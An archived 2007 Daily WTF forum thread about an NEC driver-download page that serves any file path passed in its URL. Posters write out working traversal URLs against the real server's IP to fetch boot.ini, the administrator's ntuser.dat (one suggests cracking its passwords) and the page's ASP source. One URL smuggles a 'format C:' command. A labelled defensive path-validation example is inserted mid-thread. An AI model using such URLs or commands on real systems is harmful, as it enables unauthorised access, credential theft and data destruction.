The Daily WTF: Curious Perversions in Information Technology

Direct URL Disk Access: Not just for PHP!

Last post 10-24-2007 1:59 PM by Carnildo. 55 replies.
  • 10-21-2007 12:02 AM

    Direct URL Disk Access: Not just for PHP!

    Was downloading drivers for my TV card from NEC Computers website, and noticed the URL looked rather odd.  Specifically, "http://202.188.160.140/user/user_nec_download.asp?driver_location=D:\Drivers\TV Tuner\Asus7134V2.3.0.4.exe" odd.  I thought to myself, "how about if I replaced that file location apparently on D: of the server, and took a shot at some system files?"  The results... may surprise you.

    http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\boot.ini 

    More worrying though, is that the results probably won't surprise you.

  • 10-21-2007 4:17 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    Linux is not a code base. Or a distro. Or a kernel. It's an attitude. And it's not about Open Source. It's about a bunch of people who still think vi is a good config UI.

    Notice: Phorm, and its agents including ISPs collecting data on Phorm's behalf, are specifically forbidden from performing any processing or monitoring of the content of the above post. Hence, under the Regulation of Investigatory Powers Act 2000 any such attempt to profile this page by Phorm or its agents is illegal.
  • 10-21-2007 6:30 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    They should probably just have let the webserver do that part... I mean, it is designed to fetch files and send them, no need to reinvent the square wheel. Also, they need to upgrade, that's windows 2000 server.
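
If a download script is kept instead of letting the web server serve the files, the `driver_location` value has to be confined to the driver directory. The following is an added example, not part of the thread and not the site's code; it assumes `D:\Drivers` as the download root (taken from the URL in the first post), and both function names are hypothetical.

```python
import ntpath

# Assumed download root, taken from the driver URL quoted in the first post.
BASE_DIR = r"D:\Drivers"


def resolve_download_unsafe(driver_location):
    """Behaviour the thread describes: the client-supplied path is used as-is.

    Reconstruction for contrast only; the site's ASP source is not on the page.
    """
    return driver_location


def resolve_download(driver_location, base_dir=BASE_DIR):
    """Return the path to serve, or None when the request must be refused.

    The parameter is treated as a name relative to base_dir, never as a
    filesystem path chosen by the client. Checks are lexical (Windows rules).
    """
    if not driver_location or "\x00" in driver_location:
        return None
    # Windows accepts both separators; normalise before inspecting.
    candidate = driver_location.replace("/", "\\")
    drive, rest = ntpath.splitdrive(candidate)
    # Refuse drive letters, UNC shares and rooted paths outright.
    if drive or rest.startswith("\\"):
        return None
    # Refuse alternate data streams and any other leftover colon.
    if ":" in rest:
        return None
    # Collapse "." and ".." and require the result to stay below base_dir.
    full = ntpath.normpath(ntpath.join(base_dir, rest))
    base = ntpath.normcase(ntpath.normpath(base_dir))
    if not ntpath.normcase(full).startswith(base + "\\"):
        return None
    return full


if __name__ == "__main__":
    # Constructed sample requests, modelled on the parameter values in the thread.
    for value in (r"TV Tuner\Asus7134V2.3.0.4.exe", r"C:\boot.ini", r"..\..\boot.ini"):
        print(repr(value), "->", resolve_download(value))
```

The checks are purely lexical, so they do not follow junctions or symbolic links inside the download root; running the handler under an account that can read only that directory covers what path checks miss.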
  • 10-21-2007 9:32 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    Sadly enough I could not download autoexec.bat. IIS does not seem to work with an admin account :-(
  • 10-21-2007 9:49 AM In reply to

    • Hitsuji
    • Top 100 Contributor
    • Joined on 11-21-2005
    • Cork - Ireland
    • Posts 235

    Re: Direct URL Disk Access: Not just for PHP!

    there prob is no autoexec.bat
  • 10-21-2007 1:48 PM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    How about going after C:\pagefile.sys ? ...
  • 10-21-2007 2:33 PM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    fluffy777:
    How about going after C:\pagefile.sys ? ...

    I got an HTML page with "Persits.Upload.1 (0x800A001A) The process cannot access the file because it is being used by another process."

    I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

  • 10-21-2007 2:58 PM In reply to

    • Rasit
    • Not Ranked
    • Joined on 12-30-2006
    • Posts 23

    Re: Direct URL Disk Access: Not just for PHP!

    ailivac:

    I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

    So instead of "Security through obscurity" they went with "Security through accidents"?

     

  • 10-22-2007 1:35 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    JFC! I did not believe this kind of stupid security hole possible....
    So all know who I am:
    MasterPlanSoftware:


    Congratulations you are the TRWTF.

  • 10-22-2007 3:06 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    death:
    JFC! I did not believe this kind of stupid security hole possible....

     

    I believed it possible, I just didn't think anyone would be stupid enough to actually do it.

    signature placeholder
  • 10-22-2007 3:15 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    You can even download NTLDR :)
  • 10-22-2007 3:16 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    I think there could be some gems in http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\documents and settings\administrator\ntuser.dat  :)  (replace with %20, etc as appropriate - I was lazy and let IE do the sub for me - no flaming for that please!! :D ).

    And NEC work as huge systems integrators in some of our (Australian) government projects... Amazing!

  • 10-22-2007 4:19 AM In reply to

    • XIU
    • Top 200 Contributor
    • Joined on 01-08-2007
    • Posts 139

    Re: Direct URL Disk Access: Not just for PHP!

    MrYates:

    I think there could be some gems in http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\documents and settings\administrator\ntuser.dat  :)  (replace with %20, etc as appropriate - I was lazy and let IE do the sub for me - no flaming for that please!! :D ).

    And NEC work as huge systems integrators in some of our (Australian) government projects... Amazing!

    Isn't it possible to download the required files for a tool like John the Ripper and get the admin password? (btw, FF will also do that ;) ) 

  • 10-22-2007 5:34 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    element[0]:

    death:
    JFC! I did not believe this kind of stupid security hole possible....

     

    I believed it possible, I just didn't think anyone would be stupid enough to actually do it.

    I'll add to make the intent clear:

    ... in a public production system. SOMEBODY other than creator must have seen it and approved it...

    So all know who I am:
    MasterPlanSoftware:


    Congratulations you are the TRWTF.

  • 10-22-2007 6:26 AM In reply to

    • why?
    • Not Ranked
    • Joined on 09-10-2007
    • Posts 9

    Re: Direct URL Disk Access: Not just for PHP!

    ailivac:

    fluffy777:
    How about going after C:\pagefile.sys ? ...

    I got an HTML page with "Persits.Upload.1 (0x800A001A) The process cannot access the file because it is being used by another process."

    I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

    Actually that unix doesn't by default support mandatory locks is the bug. Reading a file that's being updated can give bad data, and can lead to other problems, like not knowing what the most recent data is, which can lead to updates overwriting newer data with older data.

    Microsoft has been ahead of *nix in this regard ever since MS-DOS 3.3
  • 10-22-2007 7:42 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    why?:
    ailivac:

    fluffy777:
    How about going after C:\pagefile.sys ? ...

    I got an HTML page with "Persits.Upload.1 (0x800A001A) The process cannot access the file because it is being used by another process."

    I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

    Actually that unix doesn't by default support mandatory locks is the bug. Reading a file that's being updated can give bad data, and can lead to other problems, like not knowing what the most recent data is, which can lead to updates overwriting newer data with older data.

    Microsoft has been ahead of *nix in this regard ever since MS-DOS 3.3

    Unix supported both advisory and mandatory locking for years before Microsoft ever existed. You appear to be confused. Windows uses implicit locking, which is braindamaged and wrong: if you open a file for writing, the file is automatically locked. This generates a huge number of completely unnecessary locks, slowing the whole system down and creating deadlocks where none should exist. In the event of one application failing, it tends to spill over and break all other related applications.

    The unix policy is quite simple: no locking unless the application asks for it. Unix applications have been supporting true concurrency since before Windows ever existed - not just some penny-ante desktop toys, but concurrent access on the server between thousands of users in real time. There are no significant defects with it, although the basic APIs are a little quirky (users who don't understand them should use a wrapper library rather than the native syscalls).

    And this is before we even begin to talk about network filesystems, where you really, really want to use advisory locking. Mandatory locking has significant performance and stability issues there, so should normally be avoided.

  • 10-22-2007 9:58 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    Brillant.

     

    Surely someone with a clue should have at least given this a once over before it went live.

    I wonder what this button does...
  • 10-22-2007 11:31 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    bonus points for figuring out the path to the asp pages so we can look at the wtfs found in the source itself. that should be fun.

     

  • 10-22-2007 11:58 AM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    Under UK law at least, this may constitute hacking.

    1(1) A person is guilty of an offence if:

    a) He causes a computer to perform any function with intent to secure access to any program or data held in a computer;
    b) the access he intends to secure is unauthorized; and
    c) he knows at the time when he causes the computer to perform the function that this is the case.

    It would be for a court to decide whether data being accessible online, but with the location not published, constitutes authorisation. But I would expect not.
    TRWTF is Community Server
  • 10-22-2007 12:03 PM In reply to

    • emurphy
    • Top 50 Contributor
    • Joined on 01-14-2005
    • Granada Hills, CA
    • Posts 439

    Re: Direct URL Disk Access: Not just for PHP!

    asuffield:

    Unix supported both advisory and mandatory locking for years before Microsoft ever existed. You appear to be confused. Windows uses implicit locking, which is braindamaged and wrong: if you open a file for writing, the file is automatically locked. This generates a huge number of completely unnecessary locks, slowing the whole system down and creating deadlocks where none should exist. In the event of one application failing, it tends to spill over and break all other related applications.

     

    And now Windows is, well, locked into this scheme because of all the software that's been written to expect things to work this way.  (I may be mistaken on this point, though, feel free to correct me)

     

  • 10-22-2007 12:12 PM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    m0ffx:
    Under UK law at least, this may constitute hacking.

    1(1) A person is guilty of an offence if:

    a) He causes a computer to perform any function with intent to secure access to any program or data held in a computer;
    b) the access he intends to secure is unauthorized; and
    c) he knows at the time when he causes the computer to perform the function that this is the case.

    It would be for a court to decide whether data being accessible online, but with the location not published, constitutes authorisation. But I would expect not.

    There is only one branch of the UK police with the authority to investigate these things with a view to prosecution, and they're now part of the serious organised crime group. Local police forces are instructed to forward all such cases to that group for official ignoring. Hence, the only way to get prosecuted for computer misuse is to (a) work for the mob, or (b) offend somebody with enough political clout to get the Home Office involved.

    Aside from that, this law has been tossed onto the large pile of UK laws that are never enforced. Nobody even cares about computer crime any more, there hasn't been a movie about it in like forever.

  • 10-22-2007 12:45 PM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    http://202.188.160.140/user/user_nec_download.asp?driver_location=format%20C:%5C%20/X%20%3C%3Cyes

     

    not that I'd want anyone to go and try... 

    If the samurai gets his head chop off in combat, he should still be able to perform one last determined strike. - Hagakure
  • 10-22-2007 1:55 PM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    asuffield:

    Nobody even cares about computer crime any more, there hasn't been a movie about it in like forever.

    But and Swordfish! 

    — Flurp.
  • 10-22-2007 2:29 PM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    petvirus:

    bonus points for figuring out the path to the asp pages so we can look at the wtfs found in the source itself. that should be fun.

     

    http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\Inetpub\wwwroot\ODDS\User\user_nec_download.asp 

    Edit: 

     Looks like this is a personal computer. Has bittorrent, splintercell, skype and other games/user apps on it.

     

  • 10-22-2007 2:47 PM In reply to

    Re: Direct URL Disk Access: Not just for PHP!

    m0ffx:
    a) He causes a computer to perform any function with intent to secure access to any program or data held in a computer;
    b) the access he intends to secure is unauthorized; and
    c) he knows at the time when he causes the computer to perform the function that this is the case.

    It would be for a court to decide whether data being accessible online, but with the location not published, constitutes authorisation. But I would expect not.
    A) FTP servers are not allowed in the UK?
    B) Obviously this is authorized, who would even fathom that this is actually in any way secure? He is a kind contributor to the OSS movement.
    C) See B.
    irc://irc.slashnet.org/#TDWTF
    <Ling> Looks like [lotus] notes was indeed clock sucking and pissing wildly on my disk
    <Duplication_Prevention_Bot>